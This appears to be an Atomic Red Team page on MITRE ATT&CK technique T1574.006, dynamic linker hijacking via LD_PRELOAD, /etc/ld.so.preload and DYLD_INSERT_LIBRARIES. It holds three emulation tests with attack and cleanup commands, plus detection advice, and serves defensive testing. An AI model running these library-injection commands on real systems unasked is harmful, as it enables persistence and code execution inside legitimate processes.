# T1574.006 - Dynamic Linker Hijacking
Adversaries may execute their own malicious payloads by hijacking environment variables the dynamic linker uses to load shared libraries. During the execution preparation phase of a program, the dynamic linker loads specified absolute paths of shared libraries from environment variables and files, such as <code>LD_PRELOAD</code> on Linux or <code>DYLD_INSERT_LIBRARIES</code> on macOS. Libraries specified in environment variables are loaded first, taking precedence over system libraries with the same function name.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries)(Citation: Apple Doco Archive Dynamic Libraries) These variables are often used by developers to debug binaries without needing to recompile, deconflict mapped symbols, and implement custom functions without changing the original library.(Citation: Baeldung LD_PRELOAD)

On Linux and macOS, hijacking dynamic linker variables may grant access to the victim process's memory, system/network resources, and possibly elevated privileges. This method may also evade detection from security products since the execution is masked under a legitimate process. Adversaries can set environment variables via the command line using the <code>export</code> command, <code>setenv</code> function, or <code>putenv</code> function. Adversaries can also leverage [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006) to export variables in a shell or set variables programmatically using higher level syntax such Python’s <code>os.environ</code>.

On Linux, adversaries may set <code>LD_PRELOAD</code> to point to malicious libraries that match the name of legitimate libraries which are requested by a victim program, causing the operating system to load the adversary's malicious code upon execution of the victim program. <code>LD_PRELOAD</code> can be set via the environment variable or <code>/etc/ld.so.preload</code> file.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries) Libraries specified by <code>LD_PRELOAD</code> are loaded and mapped into memory by <code>dlopen()</code> and <code>mmap()</code> respectively.(Citation: Code Injection on Linux and macOS)(Citation: Uninformed Needle) (Citation: Phrack halfdead 1997)(Citation: Brown Exploiting Linkers) 

On macOS this behavior is conceptually the same as on Linux, differing only in how the macOS dynamic libraries (dyld) is implemented at a lower level. Adversaries can set the <code>DYLD_INSERT_LIBRARIES</code> environment variable to point to malicious libraries containing names of legitimate libraries or functions requested by a victim program.(Citation: TheEvilBit DYLD_INSERT_LIBRARIES)(Citation: Timac DYLD_INSERT_LIBRARIES)(Citation: Gabilondo DYLD_INSERT_LIBRARIES Catalina Bypass) 

## Atomic Tests

### Atomic Test #1 - Shared Library Injection via /etc/ld.so.preload
This test adds a shared library to the `ld.so.preload` list to execute and intercept API calls. This technique was used by threat actor Rocke during the exploitation of Linux web servers. This requires the `glibc` package.

Upon successful execution, bash will echo `../bin/T1574.006.so` to /etc/ld.so.preload. 

**Supported Platforms:** linux

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `bash`!
##### Description: The shared library must exist on disk at specified location (#{path_to_shared_library})

##### Check Prereq Commands:
```bash
if [ -f /tmp/T1574006.so ]; then exit 0; else exit 1; fi;

```
##### Get Prereq Commands:
```bash
gcc -shared -fPIC -o /tmp/T1574006.so PathToAtomicsFolder/T1574.006/src/Linux/T1574.006.c

```

In [ ]:
Invoke-AtomicTest T1574.006 -TestNumbers 1 -GetPreReqs

#### Attack Commands: Run with `bash`
```bash
sudo sh -c 'echo /tmp/T1574006.so > /etc/ld.so.preload'
```

In [ ]:
Invoke-AtomicTest T1574.006 -TestNumbers 1

#### Cleanup: 
```bash
sudo sed -i 's#/tmp/T1574006.so##' /etc/ld.so.preload
```

In [ ]:
Invoke-AtomicTest T1574.006 -TestNumbers 1 -Cleanup

### Atomic Test #2 - Shared Library Injection via LD_PRELOAD
This test injects a shared object library via the LD_PRELOAD environment variable to execute. This technique was used by threat actor Rocke during the exploitation of Linux web servers. This requires the `glibc` package.

Upon successful execution, bash will utilize LD_PRELOAD to load the shared object library `/etc/ld.so.preload`. Output will be via stdout.

**Supported Platforms:** linux
#### Dependencies:  Run with `bash`!
##### Description: The shared library must exist on disk at specified location (#{path_to_shared_library})

##### Check Prereq Commands:
```bash
if [ -f /tmp/T1574006.so ]; then exit 0; else exit 1; fi;

```
##### Get Prereq Commands:
```bash
gcc -shared -fPIC -o /tmp/T1574006.so PathToAtomicsFolder/T1574.006/src/Linux/T1574.006.c

```

In [ ]:
Invoke-AtomicTest T1574.006 -TestNumbers 2 -GetPreReqs

#### Attack Commands: Run with `bash`
```bash
LD_PRELOAD=/tmp/T1574006.so ls
```

In [ ]:
Invoke-AtomicTest T1574.006 -TestNumbers 2

### Atomic Test #3 - Dylib Injection via DYLD_INSERT_LIBRARIES
injects a dylib that opens calculator via env variable

**Supported Platforms:** macos

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `bash`!
##### Description: Compile the dylib from (#{source_file}). Destination is #{dylib_file}

##### Check Prereq Commands:
```bash
gcc -dynamiclib PathToAtomicsFolder/T1574.006/src/MacOS/T1574.006.c -o /tmp/T1574006MOS.dylib

```
##### Get Prereq Commands:
```bash
gcc -dynamiclib PathToAtomicsFolder/T1574.006/src/MacOS/T1574.006.c -o /tmp/T1574006MOS.dylib

```

In [ ]:
Invoke-AtomicTest T1574.006 -TestNumbers 3 -GetPreReqs

#### Attack Commands: Run with `bash`
```bash
DYLD_INSERT_LIBRARIES=/tmp/T1574006MOS.dylib /Applications/Firefox.app/Contents/MacOS/firefox
```

In [ ]:
Invoke-AtomicTest T1574.006 -TestNumbers 3

#### Cleanup: 
```bash
kill `pgrep Calculator`
kill `pgrep firefox`
```

In [ ]:
Invoke-AtomicTest T1574.006 -TestNumbers 3 -Cleanup

## Detection
Monitor for changes to environment variables and files associated with loading shared libraries such as <code>LD_PRELOAD</code> and <code>DYLD_INSERT_LIBRARIES</code>, as well as the commands to implement these changes.

Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.